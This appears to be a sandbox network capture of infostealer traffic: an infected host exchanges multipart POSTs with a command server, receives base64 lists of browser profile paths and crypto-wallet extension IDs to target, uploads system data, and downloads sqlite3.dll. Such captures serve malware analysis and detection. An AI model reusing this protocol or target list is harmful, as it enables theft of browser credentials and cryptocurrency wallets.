YmYzMzM5ZDBlYjkxNmE3ODQ5YmZiOWNmMzU0Nzc0OGFkZjRmNDZjNjgzODc1YjkwYjY2MzQwMGNiZDJkZDg3NTE4YzJiNDIyfGhlcjdoNDhyfGVyNGg0ZThyNC5maWxlfDF8MHwxfDF8MXwxfDF8MXw=
Apr 26, 2024 17:11:11.968318939 CEST	469	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKJDHIEBFIIDGDGDBA Host: 185.172.128.76 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 2d 2d 0d 0a Data Ascii: ------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------HDAKJDHIEBFIIDGDGDBAContent-Disposition: form-data; name="message"browsers------HDAKJDHIEBFIIDGDGDBA--
Apr 26, 2024 17:11:12.318020105 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 1520 Connection: keep-alive Vary: Accept-Encoding Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 64 6d 6c 32 59 57 78 6b 61 53 35 6c 65 47 56 38 51 32 39 74 62 32 52 76 49 45 52 79 59 57 64 76 62 6e 78 63 51 32 39 74 62 32 52 76 58 45 52 79 59 57 64 76 62 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 32 39 6a 51 32 39 6a 66 46 78 44 62 32 4e 44 62 32 4e 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 6e 4a 68 64 6d 56 38 58 45 4a 79 59 58 5a 6c 55 32 39 6d 64 48 64 68 63 6d 56 63 51 6e 4a 68 64 6d 55 74 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4a 79 59 58 5a 6c 4c 6d 56 34 5a 58 78 44 5a 57 35 30 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 45 4e 6c 62 6e 52 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 77 33 55 33 52 68 63 6e 78 63 4e 31 4e 30 59 58 4a 63 4e 31 4e 30 59 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 77 66 45 31 70 59 33 4a 76 63 32 39 6d 64 43 42 46 5a 47 64 6c 66 46 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 52 63 52 57 52 6e 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 31 7a 5a 57 52 6e 5a 53 35 6c 65 47 56 38 4d 7a 59 77 49 45 4a 79 62 33 64 7a 5a 58 4a 38 58 44 4d 32 4d 45 4a 79 62 33 64 7a 5a 58 4a 63 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb
Apr 26, 2024 17:11:12.318079948 CEST	427	IN	Data Raw: 32 31 6c 66 47 4a 79 62 33 64 7a 5a 58 49 75 5a 58 68 6c 66 45 39 77 5a 58 4a 68 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 62 33 42 6c 63 6d 45 75 5a 58 68 6c 66 45 39 Data Ascii: 21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRmlyZWZveHxcTW96aWxsYVxGaXJlZm94XFByb2ZpbGVzfGZpcmVmb3h8MHxQYWxlIE1vb258XE1vb25jaGlsZCBQ
Apr 26, 2024 17:11:12.320565939 CEST	468	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBGHCBAEGDHIDGCBAEC Host: 185.172.128.76 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 64 30 65 62 39 31 36 61 37 38 34 39 62 66 62 39 63 66 33 35 34 37 37 34 38 61 64 66 34 66 34 36 63 36 38 33 38 37 35 62 39 30 62 36 36 33 34 30 30 63 62 64 32 64 64 38 37 35 31 38 63 32 62 34 32 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 47 48 43 42 41 45 47 44 48 49 44 47 43 42 41 45 43 2d 2d 0d 0a Data Ascii: ------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------KEBGHCBAEGDHIDGCBAECContent-Disposition: form-data; name="message"plugins------KEBGHCBAEGDHIDGCBAEC--
Apr 26, 2024 17:11:12.672763109 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 5416 Connection: keep-alive Vary: Accept-Encoding Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 39 70 62 6d 4a 68 63 32 55 67 56 32 46 73 62 47 56 30 49 47 56 34 64 47 56 75 63 32 6c 76 62 6e 78 6f 62 6d 5a 68 62 6d 74 75 62 32 4e 6d 5a 57 39 6d 59 6d 52 6b 5a 32 4e 70 61 6d 35 74 61 47 35 6d 62 6d 74 6b 62 6d 46 68 5a 48 77 78 66 44 42 38 4d 58 78 48 64 57 46 79 5a 47 46 38 61 48 42 6e 62 47 5a 6f 5a 32 5a 75 61 47 4a 6e 63 47 70 6b 5a 57 35 71 5a 32 31 6b 5a 32 39 6c 61 57 46 77 63 47 46 6d 62 47 35 38 4d 58 77 77 66 44 42 38 53 6d 46 34 65 43 42 4d 61 57 4a 6c 63 6e 52 35 66 47 4e 71 5a 57 78 6d 63 47 78 77 62 47 56 69 5a 47 70 71 5a 57 35 73 62 48 42 71 59 32 4a 73 62 57 70 72 5a 6d 4e 6d 5a 6d 35 6c 66 44 46 38 4d 48 77 77 66 47 6c 58 59 57 78 73 5a 58 52 38 61 32 35 6a 59 32 68 6b 61 57 64 76 59 6d 64 6f 5a 57 35 69 59 6d 46 6b 5a 47 39 71 61 6d 35 75 59 57 39 6e 5a 6e 42 77 5a 6d 70 38 4d 58 77 77 66 44 42 38 54 55 56 58 49 45 4e 59 66 47 35 73 59 6d 31 75 62 6d 6c 71 59 32 35 73 5a 57 64 72 61 6d 70 77 59 32 5a 71 59 32 78 74 59 32 5a 6e 5a 32 5a 6c 5a 6d 52 74 66 44 46 38 4d 48 77 77 66 45 64 31 61 57 78 6b 56 32 46 73 62 47 56 30 66 47 35 68 62 6d 70 74 5a 47 74 75 61 47 74 70 62 6d 6c 6d 62 6d 74 6e 5a 47 4e 6e 5a 32 4e 6d 62 6d 68 6b 59 57 46 74 62 57 31 71 66 44 46 38 4d 48 77 77 66 46 4a 76 62 6d 6c 75 49 46 64 68 62 47 78 6c 64 48 78 6d 62 6d 70 6f 62 57 74 6f 61 47 31 72 59 6d 70 72 61 32 46 69 62 6d 52 6a 62 6d 35 76 5a 32 46 6e 62 32 64 69 62 6d 56 6c 59 33 77 78 66 44 42 38 4d 48 78 4f 5a 57 39 4d 61 57 35 6c 66 47 4e 77 61 47 68 73 5a 32 31 6e 59 57 31 6c 62 32 52 75 61 47 74 71 5a 47 31 72 63 47 46 75 62 47 56 73 62 6d 78 76 61 47 46 76 66 44 46 38 4d 48 77 77 66 45 4e 4d 56 69 42 58 59 57 78 73 5a 58 52 38 62 6d 68 75 61 32 4a 72 5a 32 70 70 61 32 64 6a 61 57 64 68 5a 47 39 74 61 33 42 6f 59 57 78 68 62 6d 35 6b 59 32 46 77 61 6d 74 38 4d 58 77 77 66 44 42 38 54 47 6c 78 64 57 46 73 61 58 52 35 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 64 68 62 Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhb
Apr 26, 2024 17:11:12.672833920 CEST	1289	IN	Data Raw: 47 78 6c 64 48 78 68 61 57 6c 6d 59 6d 35 69 5a 6d 39 69 63 47 31 6c 5a 57 74 70 63 47 68 6c 5a 57 6c 71 61 57 31 6b 63 47 35 73 63 47 64 77 63 48 77 78 66 44 42 38 4d 48 78 4c 5a 58 42 73 63 6e 78 6b 62 57 74 68 62 57 4e 72 62 6d 39 6e 61 32 64 Data Ascii: GxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBk
Apr 26, 2024 17:11:12.672872066 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 26, 2024 17:11:12.672909021 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 26, 2024 17:11:12.672946930 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 26, 2024 17:11:12.697710991 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHJDGIDBAAFIDGCGCAK Host: 185.172.128.76 Content-Length: 7287 Connection: Keep-Alive Cache-Control: no-cache
Apr 26, 2024 17:11:12.697782040 CEST	7287	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 4a 44 47 49 44 42 41 41 46 49 44 47 43 47 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 33 33 33 39 Data Ascii: ------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="token"bf3339d0eb916a7849bfb9cf3547748adf4f46c683875b90b663400cbd2dd87518c2b422------IEHJDGIDBAAFIDGCGCAKContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 26, 2024 17:11:13.079334021 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 26, 2024 17:11:13.487461090 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 26, 2024 17:11:13.840460062 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Apr 2024 15:11:13 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
